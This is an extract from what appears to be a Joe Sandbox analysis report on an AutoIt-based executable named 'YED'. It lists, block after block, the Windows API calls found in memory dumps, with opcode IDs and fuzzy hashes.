                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00234D1E,002428E9,?,00234CBE,002428E9,002D88B8,0000000C,00234E15,002428E9,00000002,00000000), ref: 00234DC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                • Opcode ID: de5768fe9d34b553e971399e41c9595f8445795c97113bea4ea74b86930421a0
                                                                                                                                                • Instruction ID: 0d82e6ee1a378e4d4833de78121b2d748380378c6aaa60a931dbe714cf58d7e9
                                                                                                                                                • Opcode Fuzzy Hash: de5768fe9d34b553e971399e41c9595f8445795c97113bea4ea74b86930421a0
                                                                                                                                                • Instruction Fuzzy Hash: 92F03C74A50209ABDB159F94EC49BAEBFE5EB45752F1001A4E90AA2260CF70AE50DA90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 0026D3AD
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0026D3BF
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0026D3E5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                • API String ID: 145871493-2590602151
                                                                                                                                                • Opcode ID: a62448563147c83bd3f4c591846612b7aed85799aa2f9399c0f214435f21015d
                                                                                                                                                • Instruction ID: be80f758d48cc9a2499ebecaa67f0be126d5b49c4853117ec23e784097c8b558
                                                                                                                                                • Opcode Fuzzy Hash: a62448563147c83bd3f4c591846612b7aed85799aa2f9399c0f214435f21015d
                                                                                                                                                • Instruction Fuzzy Hash: 74F05571F3962ADBD7711B219C3C9693724AF12701B6484E5F806EA216DFA0CDF08AD2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E9C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EAE
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EC0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                • API String ID: 145871493-3689287502
                                                                                                                                                • Opcode ID: ebfe66d95d7ace7b2f328307fe4dedc6251bc78d52cf82462cab1da048a8286f
                                                                                                                                                • Instruction ID: ffb02e2dc5adf9df151f250b87a84d9edafb856afb7597974b977b124c2d2b18
                                                                                                                                                • Opcode Fuzzy Hash: ebfe66d95d7ace7b2f328307fe4dedc6251bc78d52cf82462cab1da048a8286f
                                                                                                                                                • Instruction Fuzzy Hash: D6E0CD35B115235BD2322F25BC1CB9F65D4AF93F627150115FC0CD2200DF60CD5144B1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E62
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E74
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E87
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                                                • Opcode ID: 76a802d2c25cf17cc85ed7686bd2141c9bc14c7df58e651c0321e5a1df88f7a3
                                                                                                                                                • Instruction ID: 1d8e567bd9d110d4d971ff7fd3e820ecbf959a08882549711067b6c0dcb098df
                                                                                                                                                • Opcode Fuzzy Hash: 76a802d2c25cf17cc85ed7686bd2141c9bc14c7df58e651c0321e5a1df88f7a3
                                                                                                                                                • Instruction Fuzzy Hash: F5D012356226235756222F25BC1CDCB6A58AF87B553150625F90DA2114CF61CD6285E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 176396367-0
                                                                                                                                                • Opcode ID: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
                                                                                                                                                • Instruction ID: 6f36dd869536fcdf7bc4c539c5e55c53a2745d4554481fc07a96ab0b3ac48542
                                                                                                                                                • Opcode Fuzzy Hash: 8bb47df1574b82508a8568e42ad549eacc8411e96a2d4b59b127870c91da2114
                                                                                                                                                • Instruction Fuzzy Hash: EBF19D71604350DFCB15EF24C890B6BBBE6AF85314F14855DE88A9B2A2CF35E845CF92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0029A427
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0029A435
                                                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0029A468
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0029A63D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3488606520-0
                                                                                                                                                • Opcode ID: 967e17b2c34a78c5ab1cefff40f3fc87f1c290cc8012121f80f273771145613d
                                                                                                                                                • Instruction ID: 8f0f66ea4312631610b874e08fd3d766df43a059dd4cd14172bf4ed908976cb7
                                                                                                                                                • Opcode Fuzzy Hash: 967e17b2c34a78c5ab1cefff40f3fc87f1c290cc8012121f80f273771145613d
                                                                                                                                                • Instruction Fuzzy Hash: DFA1EF71614301AFDB20DF24D886F2AB7E5AF94714F14881DF95A8B292DBB0EC51CF82
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0027CF22,?), ref: 0027DDFD
                                                                                                                                                  • Part of subcall function 0027DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0027CF22,?), ref: 0027DE16
                                                                                                                                                  • Part of subcall function 0027E199: GetFileAttributesW.KERNEL32(?,0027CF95), ref: 0027E19A
                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0027E473
                                                                                                                                                • MoveFileW.KERNEL32 ref: 0027E4AC
                                                                                                                                                • _wcslen.LIBCMT ref: 0027E5EB
                                                                                                                                                • _wcslen.LIBCMT ref: 0027E603
                                                                                                                                                • SHFileOperationW.SHELL32 ref: 0027E650
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3183298772-0
                                                                                                                                                • Opcode ID: f3fee149f60ddbb7c3e2be95bba574eb934ff533921122402830eb7b188f5359
                                                                                                                                                • Instruction ID: 1aa3ed9c92586497552eca3050d7fdf9eb7214069f16eba93ff257d2b0fed117
                                                                                                                                                • Opcode Fuzzy Hash: f3fee149f60ddbb7c3e2be95bba574eb934ff533921122402830eb7b188f5359
                                                                                                                                                • Instruction Fuzzy Hash: 5F51B4B20183855BCB24EB90D8919DB73ECAF99340F00495EF68DD3151EF74A5988B66
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00278BCD
                                                                                                                                                • VariantClear.OLEAUT32 ref: 00278C3E
                                                                                                                                                • VariantClear.OLEAUT32 ref: 00278C9D
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00278D10
                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00278D3B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4136290138-0
                                                                                                                                                • Opcode ID: 52c9453ace9235e982a950333c9e91cd61cbf45185997dc1acbe4256a833f3c4
                                                                                                                                                • Instruction ID: ba61e6245641293833b4869eebade152cc1714420b51739129f0074341471bf6
                                                                                                                                                • Opcode Fuzzy Hash: 52c9453ace9235e982a950333c9e91cd61cbf45185997dc1acbe4256a833f3c4
                                                                                                                                                • Instruction Fuzzy Hash: 61515DB5A10219DFCB14CF68D894AAAB7F8FF8D314B158559E909DB350E730E911CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32 ref: 00288BAE
                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32 ref: 00288BDA
                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32 ref: 00288C32
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32 ref: 00288C57
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32 ref: 00288C5F
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                • Opcode ID: c8fb7719e3b9fdaebe1eac1be533835f702e5319c982a0ac04868afc5913089a
                                                                                                                                                • Instruction ID: 3f1fde07f9c4812a01ee5f06258bbd099f9683cf120db08e8d1608364a9ff249
                                                                                                                                                • Opcode Fuzzy Hash: c8fb7719e3b9fdaebe1eac1be533835f702e5319c982a0ac04868afc5913089a
                                                                                                                                                • Instruction Fuzzy Hash: 2E514E35A10215AFCB05DF64C885AADBBF5FF49314F088459E849AB3A2DB31ED61CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00298F40
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?,00000000,?), ref: 00298FD0
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000,00000000,?), ref: 00298FEC
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?,00000041), ref: 00299032
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00299052
                                                                                                                                                  • Part of subcall function 0022F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00281043,?,759D3F18), ref: 0022F6E6
                                                                                                                                                  • Part of subcall function 0022F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0026FA64,00000000,00000000,?,?,00281043,?,759D3F18,?,0026FA64), ref: 0022F70D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 666041331-0
                                                                                                                                                • Opcode ID: 07e6a884821397914c84b33aaae798c236af57f7e4814e47f57b75cdf597310e
                                                                                                                                                • Instruction ID: 5b4307128e6a99bb442c284cd52c79ff7aa61fe4d91bb70043e0aeac16515d31
                                                                                                                                                • Opcode Fuzzy Hash: 07e6a884821397914c84b33aaae798c236af57f7e4814e47f57b75cdf597310e
                                                                                                                                                • Instruction Fuzzy Hash: 5E515B35610205DFCB11DF68C4948ADBBF1FF5A324B5880A8E81A9B762DB31ED95CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A6C33
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A6C4A
                                                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 002A6C73
                                                                                                                                                • ShowWindow.USER32(00000002,00000000), ref: 002A6C98
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027), ref: 002A6CC7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3688381893-0
                                                                                                                                                • Opcode ID: f96bed69b2e56ccfa89010ba9aee5c3c6930fc7a75293b3e6b57b8adbfdfdefb
                                                                                                                                                • Instruction ID: ce8466677383db4ccf8e155ffba0e8b0b61179052ce63b58a1c67a57a7fa8648
                                                                                                                                                • Opcode Fuzzy Hash: f96bed69b2e56ccfa89010ba9aee5c3c6930fc7a75293b3e6b57b8adbfdfdefb
                                                                                                                                                • Instruction Fuzzy Hash: 3341E735624105AFD724DF38CC5CFA9BBA6EB0B360F190225F955A72E1CB71ED60CA50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: c2948e1ced0882d3679e8f30fe6942413e464ec0a6ade07c66093e3cbbb51092
                                                                                                                                                • Instruction ID: 6e627c1a2a9af69141de62b5aec230f183d7c6c3fa548bf440a0bdffb6b21062
                                                                                                                                                • Opcode Fuzzy Hash: c2948e1ced0882d3679e8f30fe6942413e464ec0a6ade07c66093e3cbbb51092
                                                                                                                                                • Instruction Fuzzy Hash: 3D41F132A10200EFCB28DF79C880A5EB3F5EF88310F6541A9F509EB352DA31AD15CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4210589936-0
                                                                                                                                                • Opcode ID: 8e5a0b76d9d5a8368e78c8abcb40e90f4f7deb9cd842d0d8775a3ab2549aff40
                                                                                                                                                • Instruction ID: 96e44988e3f75519fe78b96f990a56ef55bd75b69345016cd6c0546d84b83c29
                                                                                                                                                • Opcode Fuzzy Hash: 8e5a0b76d9d5a8368e78c8abcb40e90f4f7deb9cd842d0d8775a3ab2549aff40
                                                                                                                                                • Instruction Fuzzy Hash: BE41903191821BFBDF059FA8D848BEEB775FB06324F204256E429A32D0CB7059A4CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetInputState.USER32 ref: 002838CB
                                                                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00283922
                                                                                                                                                • TranslateMessage.USER32(?), ref: 0028394B
                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00283955
                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00283966
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2256411358-0
                                                                                                                                                • Opcode ID: e24e684744892cb999e68bc9a394e1d636497ce5737135654e2b62d411632786
                                                                                                                                                • Instruction ID: 445193d6009bdc5612054cb8405abb5b6d656b68e2a5d76f18d63b1b857bab64
